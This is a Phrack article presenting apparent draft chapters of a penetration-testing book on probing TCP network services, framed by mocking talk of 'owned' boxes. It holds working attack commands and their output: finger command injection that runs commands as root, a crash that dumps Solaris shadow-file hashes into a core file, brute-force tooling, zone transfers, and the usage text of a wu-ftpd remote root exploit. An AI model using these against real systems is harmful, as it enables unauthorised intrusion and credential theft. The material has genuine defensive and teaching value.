==Phrack Inc.== Volume 0x0b, Issue 0x3f, Phile #0x0c of 0x0f |=---------------------------=[ How to Hack ]=--------------------------=| |=----------------------------------------------------------------------=| |=------------------------------=[ so1o ]=------------------------------=| 1 - Introduction 2 - How Its Done 2.1 - Chapter 5, Assessing TCP Network Services 2.2 - Chapter 6, Assessing UDP Network Services 3 - Assorted IRC Logs - A Journey into My Psyche --[ 1. Introduction Friends! Confidence remains high in the hacking community as we enter 2004... despite what everybody says, the hacking scene is NOT dead! As a token of my love, to all those people who supported my hacking career by giving me warez and rootshells, to help me become the world's foremost expert on ethical computer hacking that I am today, I would like to offer this small token of my appreciation. As many of you SHOULD know, I am publishing a book on attack and penetration testing with O'reilly. Since my motto has always been "Information needs to be freed!" I am offering you, free of charge, and ready for immediate reading, 2 draft-cut chapters of my book. Other infosec experts like Ryan Russell and Mike Schiffman "expose" their hacking secrets to anybody with $45, but I'd like to send this one out to the underground, on the house. I've chosen to include the chapters as a standard ASCII text file, as opposed to a pdf or html, so you can copy sections and paste them into the motd's of boxes you have owned, so the administrators can figure out how they were hacked and how to patch themselves. --[ 2. How Its Done ----[ 2.1 Chapter 5, Assessing TCP Network Services Assessing TCP Network Services This chapter focuses on the technical execution of TCP network service assessment. Common services (including FTP, SMTP, HTTP & POP3) are accessible as plaintext network services, and so can be assessed easily using simple scripts or even a telnet client. Services that use non- plaintext proprietary protocols (including NetBIOS, SQL & LDAP) must however be assessed using more complex scripts or auditing tools, which are comprehensively covered in this chapter. Instead of comprehensively listing each and every TCP network service in order of port number, you will find that services have been grouped by their role (which will also help highlight common vulnerabilities found in different types of TCP services). The roles that TCP services have been grouped by are as follows: Internal Services Remote Information Services Remote Maintenance Services Microsoft Windows Networking Services VPN & Remote Network Access Services Network Proxy Services E-Mail & News Services Web Services Database Services Unix RPC Services Print Services Internal Services A variety of operating systems including Cisco IOS, Windows 2000 and Linux are often found to be running internal services. Such internal services are historically used for network diagnostic and connectivity checking purposes, and rarely have useful application in modern network environments. Internal TCP services are commonly defined within Unix and Windows services files as the following (it should be noted that many of these services also listen on UDP ports): tcpmux 1/tcp echo 7/tcp discard 9/tcp daytime 13/tcp qotd 17/tcp chargen 19/tcp time 37/tcp The echo, discard, qotd and chargen services provide little insight into system configuration, and to date no direct system access can be gained through these services. A denial of service attack can however be launched if both echo and chargen are running. Echo and Chargen Denial of Service If host IP sequence numbers are easily predicted, a spoofed TCP session can be initiated to confuse the target system into connecting to itself from port 7 (echo) to port 19 (chargen) over TCP or UDP. The chargen service generates a continuous stream of ASCII characters and sends them to the echo service, causing them to be processed and echoed back. Performance of devices with limited processing resources (such as entry- level routers) can be degraded heavily with this type of attack. Denial of Service tools such as fraggle target these internal services. The TCP multiplexer service (tcpmux, running on TCP port 1) is common to IRIX system platforms. The tcpmux service itself contains no known vulnerabilities, but is an indicator of the hosts operating platform. The service behaves much like an RPC portmapper, allowing for services to run on arbitrary ports (described in RFC 1078). The daytime and time services (running on TCP ports 13 and 37 respectively) can be queried to deduce the time zone of the target system and its approximate location, as shown in figure 22 below. Figure 22: Using telnet to connect to the daytime service # telnet 192.168.0.1 13 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Sat Jan 4 08:16:57 2003 Connection closed by foreign host. Remote Information Services Unix-based systems (including Linux, Solaris, FreeBSD and other variants) and platforms such as Cisco IOS can be found to be running remote information services that provide system, user and network details over TCP/IP. Such services can be probed to collate username listings and details of trusted networks and hosts, and in some cases compromise systems directly. A simple list of remote information services has been taken from the services file: systat 11/tcp netstat 15/tcp domain 53/tcp finger 79/tcp auth 113/tcp ldap 389/tcp Systat and Netstat The systat and netstat services in particular are of interest, as current network and system information can be easily gleaned through connecting to the services using telnet. If we take a look at a Unix /etc/inetd.conf file from a system running systat and netstat, we find: systat stream tcp nowait root /usr/bin/ps ps -ef netstat stream tcp nowait root /usr/bin/netstat netstat -a Effectively, the ps -ef and netstat -a commands are bound to TCP ports 11 and 15 respectively. Figures 23 and 24 show live results accessed through these services. Figure 23: Linux system information gleaned through systat # telnet 192.168.0.1 11 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. UID PID PPID C STIME TTY TIME CMD root 1 0 0 Jan03 ? 00:00:05 init [2] root 2 1 0 Jan03 ? 00:00:00 [keventd] root 3 1 0 Jan03 ? 00:00:00 [ksoftirqd_CPU0] root 4 1 0 Jan03 ? 00:00:00 [kswapd] root 5 1 0 Jan03 ? 00:00:00 [bdflush] root 6 1 0 Jan03 ? 00:00:00 [kupdated] root 10 1 0 Jan03 ? 00:00:00 [khubd] root 492 1 0 Jan03 ? 00:00:00 /sbin/syslogd root 495 1 0 Jan03 ? 00:00:00 /sbin/klogd root 503 1 0 Jan03 ? 00:00:00 /usr/sbin/dhcpd -q root 512 1 0 Jan03 ? 00:00:00 /usr/sbin/inetd root 520 1 0 Jan03 ? 00:00:00 /usr/sbin/sshd daemon 523 1 0 Jan03 ? 00:00:00 /usr/sbin/atd root 526 1 0 Jan03 ? 00:00:00 /usr/sbin/cron root 531 1 0 Jan03 tty1 00:00:00 -bash root 532 1 0 Jan03 tty2 00:00:00 /sbin/getty 38400 tty2 root 533 1 0 Jan03 tty3 00:00:00 /sbin/getty 38400 tty3 root 534 1 0 Jan03 tty4 00:00:00 /sbin/getty 38400 tty4 root 535 1 0 Jan03 tty5 00:00:00 /sbin/getty 38400 tty5 root 536 1 0 Jan03 tty6 00:00:00 /sbin/getty 38400 tty6 root 887 1 0 Jan03 ? 00:00:03 /usr/sbin/named root 913 1 0 Jan03 ? 00:00:00 [eth0] root 918 1 0 Jan03 ? 00:00:00 [eth1] root 1985 520 0 08:05 ? 00:00:00 /usr/sbin/sshd root 1987 1985 0 08:05 pts/0 00:00:00 -bash root 2066 1987 0 10:44 pts/0 00:00:00 ps -ef Figure 24: Linux system information gleaned through netstat # telnet 192.168.0.1 15 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:time *:* LISTEN tcp 0 0 *:discard *:* LISTEN tcp 0 0 *:daytime *:* LISTEN tcp 0 0 no-dns-yet.demon:domain *:* LISTEN tcp 0 0 192.168.0.1:domain *:* LISTEN tcp 0 0 mail:domain *:* LISTEN tcp 0 0 *:ssh *:* LISTEN tcp 0 0 *:smtp *:* LISTEN tcp 0 52 no-dns-yet.demon.co:ssh pc-62-20-40-1- az.b:3526 ESTABLISHED udp 0 0 *:32769 *:* udp 0 0 *:discard *:* udp 0 0 no-dns-yet.demon:domain *:* udp 0 0 192.168.0.1:domain *:* udp 0 0 mail:domain *:* udp 0 0 *:bootps *:* raw 0 0 *:icmp *:* 7 Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 5 [ ] DGRAM 456 /dev/log unix 2 [ ACC ] STREAM LISTENING 1125 /var/run/ndc unix 2 [ ] DGRAM 1123 unix 2 [ ] DGRAM 516 unix 2 [ ] DGRAM 489 This detailed system information gives insight into the following areas of the target environment: Processes running on the target host 2. User names of process owners that can be later used to undertake brute force password guessing attacks to gain access to network components 3. Sensitive details within process strings (such as a SQL query run from the command line containing both the SQL server IP address and password details) Details of current network connections to internal and trusted hosts DNS The Domain Name System is primarily used across UDP and so assessment techniques are comprehensively covered in Chapter 6. Most DNS servers do also listen on TCP port 53 for DNS zone transfer purposes when secondary name servers request the latest DNS zone file from the primary name server. As discussed earlier in Chapter 3, a DNS zone file contains all of the naming information that the name server stores regarding a specific DNS domain. A DNS zone transfer can often be launched to retrieve details of non-public internal networks and other useful information that can be used to build an accurate map of the target infrastructure. It is strongly recommended, for reasons of load balancing and fault tolerance, that organizations use more than one name server. The main name server is known as the primary name server, and all subsequent name servers are secondary name servers. Either a primary or secondary name server can be queried for name resolution, so it is necessary that the DNS information residing on each name server is current. To ensure this is the case, when a secondary name server is started and at regular, specifiable intervals thereafter, it requests a complete listing of the computers it is responsible for from the primary name server. The process of requesting and receiving this information is a zone transfer. Windows tools such as nslookup and the Sam Spade Windows client (available from www.samspade.org) can be used to perform a DNS zone transfer (as detailed earlier in Chapter 3), but the most effective method is to issue a DNS zone transfer request against a specific DNS server is to use the Unix dig command: # dig @auth100.ns.uu.net ucia.gov axfr ; <<>> DiG 9.2.1 <<>> @auth100.ns.uu.net ucia.gov axfr ;; global options: printcmd ucia.gov. 86400 IN SOA ain- relay1.net.cia.gov.ucia.gov. root.puff.ucia.gov. 301033806 7200 3600 604800 86400 ucia.gov. 86400 IN NS relay1.ucia.gov. ucia.gov. 86400 IN NS auth100.ns.uu.net. ucia.gov. 86400 IN MX 5 relay2.ucia.gov. relay2-qfe0.ucia.gov. 86400 IN CNAME relay2.ucia.gov. relay1-qfe0.ucia.gov. 86400 IN CNAME relay1.ucia.gov. ain-relay1-ext.ucia.gov. 86400 IN CNAME relay1.ucia.gov. ex-rtr-191-a.ucia.gov. 86400 IN A 192.103.66.58 ain-relay11-ext.ucia.gov. 86400 IN CNAME relay11.ucia.gov. ex-rtr-191-b.ucia.gov. 86400 IN A 192.103.66.62 relay.ucia.gov. 86400 IN CNAME relay1.ucia.gov. relay2-int.ucia.gov. 86400 IN CNAME ain-relay2- le1.ucia.gov. ain-relay11-qfe0.ucia.gov. 86400 IN CNAME relay11.ucia.gov. relay11-int.ucia.gov. 86400 IN A 192.168.64.4 ain.ucia.gov. 86400 IN A 198.81.128.68 foia.ucia.gov. 86400 IN CNAME www.foia.ucia.gov. relay11.ucia.gov. 86400 IN A 198.81.129.195 ain-relay2-ext.ucia.gov. 86400 IN CNAME relay2.ucia.gov. relay1-ext.ucia.gov. 86400 IN CNAME relay1.ucia.gov. relay11-qfe0.ucia.gov. 86400 IN CNAME relay11.ucia.gov. relay2t.ucia.gov. 86400 IN A 198.81.129.34 ain-relay2-qfe1.ucia.gov. 86400 IN A 192.168.64.3 ain-relay1-qfe0.ucia.gov. 86400 IN CNAME relay1.ucia.gov. ain-relay1-qfe1.ucia.gov. 86400 IN A 192.168.64.2 ex-rtr.ucia.gov. 86400 IN CNAME ex-rtr- 129.ucia.gov. wais.ucia.gov. 86400 IN CNAME relay2.ucia.gov. relay2-ext.ucia.gov. 86400 IN CNAME relay2.ucia.gov. ain-relay1-int.ucia.gov. 86400 IN CNAME ain-relay1- qfe1.ucia.gov. ain-relay.ucia.gov. 86400 IN CNAME relay1.ucia.gov. relay11-ext.ucia.gov. 86400 IN CNAME relay11.ucia.gov. relay1.ucia.gov. 86400 IN A 198.81.129.193 relay2.ucia.gov. 86400 IN A 198.81.129.194 ain-relay-int.ucia.gov. 86400 IN CNAME ain-relay1- qfe1.ucia.gov. relay-int.ucia.gov. 86400 IN CNAME ain-relay1- qfe1.ucia.gov. ex-rtr-129.ucia.gov. 86400 IN HINFO "Cisco 4000 Router" "NP-1E Board " ex-rtr-129.ucia.gov. 86400 IN A 198.81.129.222 ain-relay2-int.ucia.gov. 86400 IN CNAME ain-relay2- le1.ucia.gov. ain-relay2-le0.ucia.gov. 86400 IN CNAME relay2.ucia.gov. relay1-int.ucia.gov. 86400 IN CNAME ain-relay1- qfe1.ucia.gov. ucia.gov. 86400 IN SOA ain- relay1.net.cia.gov.ucia.gov. root.puff.ucia.gov. 301033806 7200 3600 604800 86400 ;; Query time: 169 msec ;; SERVER: 198.6.1.202#53(auth100.ns.uu.net) ;; XFR size: 41 records Finger The finger service is commonly found listening on TCP port 79 of devices such as Cisco routers and managed switches. Default out-the-box builds of many commercial Unix-based systems run the service (including Solaris and BSDI). The finger service can be queried using either the finger client (found in most operating platforms) or by directly using telnet and connecting to port 79. Figures 25 and 26 follow, showing the difference in results from fingering a Cisco IOS device and a Solaris server. Figure 25: A finger query against a Cisco router using telnet # telnet 192.168.0.1 79 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Line User Host(s) Idle Location * 1 vty 0 idle 00:00:00 192.168.0.252 Se0 Sync PPP 00:00:00 Connection closed by foreign host. Figure 26: Using the finger client to query a Solaris server # finger @192.168.0.10 [192.168.0.10] Login Name TTY Idle When Where crm Chris McNab pts/0 1 Tue 09:08 192.168.0.252 axd Andrew Done pts/4 3d Thu 11:57 192.168.0.251 A null query will result in the current users being shown under most finger services. From analyzing the format of the response, we can easily differentiate a Cisco finger service from that running on a Solaris host. Finger Information Leak Bugs Various information leak vulnerabilities exist in finger implementations, of which a popular attack involves a '1 2 3 4 5 6 7 8 9 0' request against a Solaris host running fingerd. This following bug shown in figure 27 is present in all Solaris releases up to 8: Figure 27: Using a malformed finger request to glean user details # finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10 [192.168.0.10] Login Name TTY Idle When Where root Super-User console :0 admin Super-User console :0 daemon ??? < . . . . > bin ??? < . . . . > sys ??? < . . . . > adm Admin < . . . . > lp Line Printer Admin < . . . . > uucp uucp Admin < . . . . > nuucp uucp Admin < . . . . > listen Network Admin < . . . . > nobody Nobody < . . . . > noaccess No Access User < . . . . > nobody4 SunOS 4.x Nobody < . . . . > informix Informix User < . . . . > crm Chris McNab pts/0 1 Tue 09:08 192.168.0.252 axd Andrew Done pts/4 3d Thu 11:57 192.168.0.251 Many Unix-based finger services perform a simple cross-reference operation of the query string against user information fields in the /etc/passwd file, and so the following finger query strings can be used to glean useful information: finger .@target.host finger 0@target.host finger **@target.host finger user@target.host Finger Redirection In some cases, servers running finger will exist on multiple networks (such as the Internet and an internal network space). With knowledge of internal IP ranges and host names, it is often possible to perform a finger bounce attack to glean internal user names and host details as shown in figure 28 below. Figure 28: Using finger to redirect a request to an internal host # finger @192.168.0.10@217.34.317.200 [217.34.217.200] [192.168.0.10] Login Name TTY Idle When Where crm Chris McNab pts/0 1 Tue 09:08 192.168.0.252 axd Andrew Done pts/4 3d Thu 11:57 192.168.0.251 Directly Exploitable Finger Bugs Poorly written finger implementations will allow attackers to pipe commands through finger which are in turn run on the target host by the owner of the service process (such as root or bin under Unix-based systems). Figure 29 below shows an example of a vulnerable finger service running on a vulnerable DG-UX platform. Figure 29: Issuing id and netstat commands through finger # finger "|/bin/id@192.168.0.135" [192.168.0.135] uid=0(root) gid=0(root) # finger "|/bin/netstat@192.168.0.135" [192.168.0.135] Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 localhost.localdo:45233 localhost.localdo:45232 ESTABLISHED tcp 0 0 localhost.localdo:45232 localhost.localdo:45233 ESTABLISHED tcp 0 0 localhost.localdo:45235 localhost.localdo:45234 ESTABLISHED tcp 0 0 localhost.localdo:45234 localhost.localdo:45235 ESTABLISHED tcp 0 0 localhost.localdo:45237 localhost.localdo:45236 ESTABLISHED tcp 0 0 localhost.localdo:45236 localhost.localdo:45237 ESTABLISHED tcp 0 11433 mdma.lab.org:http 62.167.163.193:3414 ESTABLISHED tcp 0 0 localhost.localdo:45229 localhost.localdo:45228 ESTABLISHED tcp 0 0 localhost.localdo:45228 localhost.localdo:45229 ESTABLISHED tcp 0 0 localhost.localdo:45231 localhost.localdo:45230 ESTABLISHED tcp 0 0 localhost.localdo:45230 localhost.localdo:45231 ESTABLISHED tcp 0 0 el8.net:ssh 195.188.198.198:38930 ESTABLISHED tcp 0 0 el8.net:34785 209.126.200.130:ircd ESTABLISHED Serious buffer overflow vulnerabilities exist in many Linux fingerd packages, including cfingerd. At the time of writing, cfingerd 1.4.3 and prior running on Linux (packaged with Debian and Red Hat in particular) is especially susceptible to a plethora of remote and locally exploitable bugs. For current details of publicly available fingerd exploits, you can search Packet Storm's archives for 'finger exploit'. Auth The Unix auth service (also known as identd) listens on TCP port 113. The primary purpose of auth is to provide a degree of authentication through mapping local user names to TCP network ports being used. IRC (Internet Relay Chat) is a good example of this, as when a user connects to an IRC server, an auth request is sent to TCP port 113 of the host to retrieve the user's current login name. The auth service can be queried in-line with RFC 1413 to match open TCP ports on the target host with local usernames. This username information has two different uses to an attacker: To derive the owners of processes with open ports If for example, a vulnerable version of BIND is found to be running on a target server and TCP port 113 is also open, an identd cross-referenced port scan will reveal the user running the BIND process on the server. If the process is owned by named (as opposed to root), then the BIND process may exist in a chroot jail and be difficult to compromise. To enumerate and list valid usernames From enumerating valid user login details, an attacker can seek to launch brute force attacks and take advantage of weak password policies. Nmap has the capability to cross-reference open ports with identd. Figure 30 below shows such an identd scan being run to identify a handful of active user accounts. Figure 30: Nmap being used to perform identd cross-referencing # nmap -I -sS 192.168.0.10 Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Interesting ports on dockmaster (192.168.0.10): (The 1595 ports scanned but not shown below are in state: closed) Port State Service Owner 22/tcp open ssh root 25/tcp open smtp root 80/tcp open http nobody 110/tcp open pop-3 root 113/tcp open auth ident 8080/tcp open http-proxy nobody The Linux jidentd and cidentd packages contain various buffer overflow vulnerabilities. It is highly recommended that research is undertaken when assessing servers found to have identd running, including enumeration of the operating platform to ascertain the probable type of identd service running. Rusers The Unix rusersd service is an RPC (Remote Procedure Call) service that listens on a dynamic TCP port. The rusers client utility first connects to the RPC portmapper on TCP port 111, which returns the whereabouts of the rusers service if it is indeed active. If during initial TCP port scans, the RPC portmapper service is not found to be accessible on TCP port 111, it is highly unlikely that rusersd will be running. However if TCP port 111 is found to be accessible, the rpcinfo client can be used to check for the presence of rusersd and other accessible RPC services as detailed below in figure 31. Figure 31: Using rpcinfo to retrieve details of active RPC services # rpcinfo -p 192.168.0.50 program vers proto port service 100000 4 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100024 1 udp 32772 status 100024 1 tcp 32771 status 100021 4 udp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100005 1 udp 32781 mountd 100005 1 tcp 32776 mountd 100003 2 udp 2049 nfs 100011 1 udp 32822 rquotad 100002 2 udp 32823 rusersd 100002 3 tcp 33180 rusersd From finding that rusersd is indeed running, we can probe the service with the rusers client from any Unix-based platform to retrieve a list of users who are logged into the system: # rusers -l 192.168.0.50 Sending broadcast for rusersd protocol version 3... Sending broadcast for rusersd protocol version 2... jah onyx:console Mar 3 13:03 22:03 amber onyx:ttyp1 Mar 2 07:40 sebree onyx:ttyp5 Mar 2 10:35 14 tut onyx:ttyp6 Mar 2 10:48 LDAP The Lightweight Directory Access Protocol (LDAP) service is commonly found on Windows 2000 Active Directory, Exchange and Lotus Domino servers. The system is used to provide user directory information to clients. LDAP is highly extensible and widely supported by Apache, MS Exchange, Outlook, Netscape Communicator and others. LDAP can be queried anonymously (mileage depending on the server configuration) using the ldp.exe utility from the Microsoft Windows 2000 Support Tools Kit (found on the Windows 2000 Server installation CD under the \support\tools\ directory). Figure 32 below shows ldp.exe being run against a Windows 2000 server running Lotus Domino. Figure 32: Enumerating information anonymously via LDAP [pic] A very simple Unix-based alternative to ldp.exe is the ldapsearch tool that is bundled with OpenLDAP (www.openldap.org), shown performing the same anonymous LDAP search against 192.168.0.65 (a Lotus Domino server on Windows 2000): # ldapsearch -h 192.168.0.65 < non-relevant results removed for aesthetic purposes > # Nick Baskett, Trustmatta dn: CN=Nick Baskett,O=Trustmatta mail: nick.baskett@trustmatta.com givenname: Nick sn: Baskett cn: Nick Baskett, nick uid: nick maildomain: trustmatta # Andrew Done, Trustmatta\2C andrew dn: CN=Andrew Done,O=Trustmatta\, andrew mail: andrew.done@trustmatta.com givenname: Andrew sn: Done uid: andrew maildomain: trustmatta # James Woodcock, Trustmatta\2C james dn: CN=James Woodcock,O=Trustmatta\, james mail: james.woodcock@trustmatta.com givenname: James sn: Woodcock uid: james maildomain: trustmatta # Jim Chalmers, Trustmatta\2C jim dn: CN=Jim Chalmers,O=Trustmatta\, jim mail: jim.chalmers@trustmatta.com givenname: Jim sn: Chalmers uid: Jim maildomain: trustmatta Anonymous access to LDAP has limited use, however if LDAP is found running under Windows 2000 it can be attacked by brute force with a list of valid user names (enumerated through NetBIOS, SNMP or other techniques) to find both users with weak system passwords, and gain access to LDAP itself. The Unix-based bf_ldap tool can be used to effectively perform an LDAP brute force attack, available from www.trustmatta.com/tools/bf_ldap.tar.gz. The usage of bf_ldap is demonstrated in figure 33 as follows. Figure 33: The bf_ldap LDAP brute force utility # bf_ldap Eliel Sardanons Usage: bf_ldap parameters: -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,) Remote Maintenance Services Services used by network administrators to directly manage remote hosts over TCP/IP include Telnet, FTP, SSH, VNC and raft of others. Remote maintenance services are threatened by three categories of attack in particular: Information leak attacks, where user and system details can be gleaned Process manipulation, including overflow attacks involving malformed data Brute force guessing of user passwords to gain direct access For example, an online bank may be running the telnet service on its Internet routers for administrative purposes. This telnet service may not be vulnerable to information leak or process manipulation attacks, but a determined attacker will spend an amount of time undertaking a brute force attack against the device service in order to gain access. Brute force is seriously underestimated as an attack vector by many organizations. Common remote maintenance services taken from the services file are as follows: ftp 21/tcp ssh 22/tcp telnet 23/tcp exec 512/tcp login 513/tcp shell 514/tcp controlit 799/tcp x11 6000/tcp citrix-ica 1494/tcp ms-rdp 3389/tcp pcanywheredata 5631/tcp pcanywherestat 5632/tcp vnc-http 5800/tcp vnc 5900/tcp pcanywhere 65301/tcp FTP File Transfer Protocol services are primarily found running on network servers for file transfer purposes. The FTP service uses two TCP ports to function correctly: TCP port 21 (the FTP control port), used to issue FTP commands TCP port 20 (the FTP data port), used to transfer data from the server to clients When finding a server running FTP, the first piece of information that will be gleaned from connecting to the service is the FTP server banner: # ftp 192.168.0.11 Connected to 192.168.0.11 (192.168.0.11). 220 darkside FTP server ready. Name (192.168.0.11:root): The banner above is that of a Solaris 9 server. Solaris 8 (SunOS 5.8) and prior return the operating system detail in a slightly different banner: # ftp 192.168.0.12 Connected to 192.168.0.12 (192.168.0.12). 220 lackie FTP server (SunOS 5.8) ready. Name (192.168.0.12:root): If the banner is obfuscated or modified to remove service version or operating system information, the service can sometimes be identified by analyzing responses to quote help and syst commands upon logging in anonymously, as shown in figure 34 below. Figure 34: Logging into and querying an FTP service # ftp 192.168.0.250 Connected to 192.168.0.250 (192.168.0.250). 220 ftp.trustmatta.com FTP server ready. Name (ftp.trustmatta.com:root): ftp 331 Guest login ok, send your complete e-mail address as password. Password: 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> quote help 214-The following commands are recognized (* =>'s unimplemented). USER PORT STOR MSAM* RNTO NLST MKD CDUP PASS PASV APPE MRSQ* ABOR SITE XMKD XCUP ACCT* TYPE MLFL* MRCP* DELE SYST RMD STOU SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZE REIN* MODE MSND* REST XCWD HELP PWD MDTM QUIT RETR MSOM* RNFR LIST NOOP XPWD 214 Direct comments to ftpadmin@ftp.trustmatta.com ftp> syst 215 UNIX Type: L8 Version: SUNOS Common FTP Banner List Sun Solaris 7: 220 hostname FTP server (SunOS 5.7) ready. Sun SunOS 4.1.x: 220 hostname FTP server (SunOS 4.1) ready. FreeBSD 3.x: 220 hostname FTP server (Version 6.00) ready. FreeBSD 4.x: 220 hostname FTP server (Version 6.00LS) ready. NetBSD 1.5.x: 220 hostname FTP server (NetBSD-ftpd 20010329) ready. OpenBSD: 220 hostname FTP server (Version 6.5/OpenBSD) ready. SGI IRIX 6.x 220 hostname FTP server ready. IBM AIX 4.x: 220 hostname FTP server (Version 4.1 Tue Sep 8 17:35:59 CDT 1998) ready. Compaq Tru64: 220 hostname FTP server (Digital UNIX Version 5.60) ready. HP-UX 11.x: 220 hostname FTP server (Version 1.1.214.6 Wed Feb 9 08:03:34 GMT 2000) ready. DEC Ultrix 4.1: 220 hostname FTP server (Version 4.1 Sun Mar 25 22:59:11 EST 1990) ready. Apple MacOS: 220 hostname FTP server (Version 6.00) ready. Washington University FTP (WU-FTP) 2.4.2 BETA 18: 220 hostname FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Jan 15 15:02:27 JST 1999) ready. Washington University FTP (WU-FTP) 2.5.0: 220 hostname FTP server (Version wu-2.5.0(1) Tue Jun 15 12:43:57 MST 1999) ready. ProFTPD 1.2.4 220 ProFTPD 1.2.4 Server (hostname) [hostname] WU-FTP and ProFTPD are often found running on Linux hosts, although sometimes administrators chose to run these third party FTP services on FreeBSD, Solaris and other Unix-based platforms. Solaris FTP Vulnerabilities The following glob() bug is present in out-the-box Solaris installations up to Solaris 8. By issuing requests of CWD ~username, we can effectively enumerate valid user accounts without even logging into the FTP server (described in detail at www.iss.net/security_center/static/6332.php). In this example, blah and test users do not exist, but chris does: # telnet 192.168.0.12 21 Trying 192.168.0.12... Connected to 192.168.0.12. Escape character is '^]'. 220 lackie FTP server (SunOS 5.8) ready. CWD ~blah 530 Please login with USER and PASS. 550 Unknown user name after ~ CWD ~test 530 Please login with USER and PASS. 550 Unknown user name after ~ CWD ~chris 530 Please login with USER and PASS. QUIT 221 Goodbye. Connection closed by foreign host. This glob() bug can be exploited within Solaris, resulting in a heap overflow. Local users can easily abuse this bug so that the Solaris FTP service dumps a core file containing encrypted user passwords from the /etc/shadow file, and other sensitive information (vulnerable in Solaris 8 and below): $ telnet localhost 21 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 cookiemonster FTP server (SunOS 5.6) ready. user chris 331 Password required for chris. pass blahblah 530 Login incorrect. CWD ~ 530 Please login with USER and PASS. Connection closed by foreign host. $ ls -la /core -rw-r--r-- 1 root root 284304 Apr 16 10:20 /core $ strings /core | grep :: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: chris:XEC/9QJZ4nSn2:12040:::::: sshd:*LK*::::::: $ A public exploit has not yet been released to remotely compromise Solaris hosts with this vulnerability. Theoretically, the service could be exploited under Solaris if write access to the file system is permitted through FTP (although this may be difficult to exploit under Solaris due to NULL pointer issues). The glob() vulnerability has been publicly exploited under BSD systems (including NetBSD, OpenBSD, FreeBSD), which discussed in the following section. BSD FTP Vulnerabilities for which an exploit script is available from www.phreak.org/archives/exploits/unix/ftpd-exploits/turkey2.c. FTP server 6.00 FTP server 6.00LS WU-FTPD Vulnerabilities WU-FTPD 2.4.2 BETA 18 WU-FTPD version 2.4.2 BETA 18 and prior are vulnerable to a stack overflow due to insufficient bounds checking in the realpath() function within the FTP service. Exploitation occurs through an attacker creating a complex directory structure and then navigating through the structure and executing arbitrary commands through a stack overflow. A Unix exploit script for use against Red Hat and Slackware Linux distributions running WU-FTPD 2.4.2 BETA 18 is archived at www.trustmatta.com/tools/w00f.c. The CVE reference for this vulnerability is CVE-1999-0368, and the ISS X-Force has compiled background vulnerability information at www.iss.net/security_center/static/1728.php. WU-FTPD 2.5.0 WU-FTPD version 2.5.0 and prior is vulnerable to remote a MAPPING_CHDIR stack overflow, through a user with write access to the FTP server creating a series of directories on the host, and using CWD to overflow the mapped_path variable. An exploit for use against Red Hat and Debian Linux distributions is ifafoffuffoffaf by TESO, available in source form from www.trustmatta.com/tools/ifafoffuffoffaf.c. The CVE reference for this vulnerability is CVE-1999-0878, and the ISS X-Force has compiled background vulnerability information at www.iss.net/security_center/static/3158.php. WU-FTPD 2.6.0 WU-FTPD version 2.6.0 and prior is vulnerable to an lreply() and SITE EXEC format string attack. In order for the attack to be executed, the user must be successfully logged in either anonymously or with a valid account. Many versions of the remote exploit can be found for FreeBSD, Red Hat and SuSe Linux (one exploit in particular is archived at www.trustmatta.com/tools/wuftp-god.c). The CVE reference for the vulnerability is CVE-2000-0573, and the ISS X-Force has compiled a good list of links and background information accessible at www.iss.net/security_center/static/4773.php. WU-FTPD 2.6.1 WU-FTPD version 2.6.1 and prior is vulnerable a glob() heap corruption attack through issuing a series of RNFR and CWD ~{ commands to the FTP service. In order for such commands to be successfully issued, the user must be logged in either anonymously, or with a legitimate user account. TESO released an exploit script called 7350wurm that is capable of exploiting this vulnerability on most Linux distributions (Red Hat, Debian, Mandrake, SuSe, Immunix and Caldera in particular), and is archived at www.trustmatta.com/tools/7350wurm.c. The CVE reference for the vulnerability is CVE-2001-550, and the ISS X-Force has compiled a good page of background information about the vulnerability at www.iss.net/security_center/static/7611.php. Exploiting WU-FTPD on Linux with 7350wurm One excellent trick that 7350wurm has up its sleeve is the capability to effectively exploit the following WU-FTPD servers found running on Linux hosts out-of-the-box: # 7350wurm 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). usage: ./7350wurm [-h] [-v] [-a] [-D] [-m] [-t ] [-u ] [-p ] [-d host] [-L ] [-A ] -h this help -v be verbose (default: off, twice for greater effect) -a AUTO mode (target from banner) -D DEBUG mode (waits for keypresses) -m enable mass mode (use with care) -t num choose target (0 for list, try -v or -v -v) -u user username to login to FTP (default: "ftp") -p pass password to use (default: "mozilla@") -d dest IP address or fqhn to connect to (default: 127.0.0.1) -L loc override target-supplied retloc (format: 0xdeadbeef) -A addr override target-supplied retaddr (format: 0xcafebabe) # 7350wurm -t0 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). num . description ----+------------------------------------------------------- 1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd- 2.6.1-13OL.i386.rpm] 2 | Debian potato [wu-ftpd_2.6.0-3.deb] 3 | Debian potato [wu-ftpd_2.6.0-5.1.deb] 4 | Debian potato [wu-ftpd_2.6.0-5.3.deb] 5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb] 6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] 7 | Immunix 7.0 (Stolichnaya) 